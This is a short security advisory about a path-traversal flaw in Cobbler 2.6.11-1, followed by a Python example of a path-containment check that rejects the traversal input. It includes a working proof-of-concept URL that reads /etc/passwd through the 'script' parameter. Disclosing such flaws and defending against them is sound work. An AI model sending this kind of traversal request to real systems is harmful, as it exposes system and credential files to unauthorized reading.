The Cobbler software component suffers from an invalid parameter validation vulnerability that leads to arbitrary file reading.

Navigate to the following URL on a default installation of cobbler and cobbler-web (version 2.6.11-1):

http://localhost/cblr/svc/profile/<valid_profile>/op/script?scriptx=script/script/script/script/script/script/script/script/&script=../../../../../etc/passwd

Product bug: https://bugzilla.redhat.com/show_bug.cgi?id=1399333
Statement: Red Hat Satellite 5 is now in Production 3 Phase of the support and maintenance life cycle. This has been rated as having Moderate security impact and is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/satellite
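
The missing validation on the `script` parameter described above is a path-containment check. The following is an added example, not Cobbler's code or its fix: `resolve_script`, `UnsafeScriptName`, and the temporary script directory are hypothetical names and constructed inputs used only to show the check rejecting the `../../../../../etc/passwd` value from the URL.

```python
import os
import tempfile


class UnsafeScriptName(ValueError):
    """Requested script name does not resolve to a file inside the script directory."""


def resolve_script(base_dir, requested):
    """Return the real path of `requested` under `base_dir`, or raise UnsafeScriptName."""
    if not requested or "\x00" in requested:
        raise UnsafeScriptName("empty name or NUL byte")
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks, so the comparison
    # is made against the file that would actually be opened.
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise UnsafeScriptName("resolves outside script directory: %r" % requested)
    if not os.path.isfile(candidate):
        raise UnsafeScriptName("no such script: %r" % requested)
    return candidate


def demo():
    """Run the check over constructed inputs, including the value from the URL above."""
    names = ("sample_script", "../../../../../etc/passwd", "/etc/passwd", "link", "../secret")
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "scripts")  # constructed stand-in for the script directory
        os.mkdir(base)
        with open(os.path.join(base, "sample_script"), "w") as fh:
            fh.write("# constructed sample script\n")
        with open(os.path.join(root, "secret"), "w") as fh:
            fh.write("outside the script directory\n")
        # A symlink inside the directory that points outside it must also be refused.
        os.symlink(os.path.join(root, "secret"), os.path.join(base, "link"))
        for name in names:
            try:
                resolve_script(base, name)
                results[name] = "allowed"
            except UnsafeScriptName:
                results[name] = "rejected"
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(verdict, name)
```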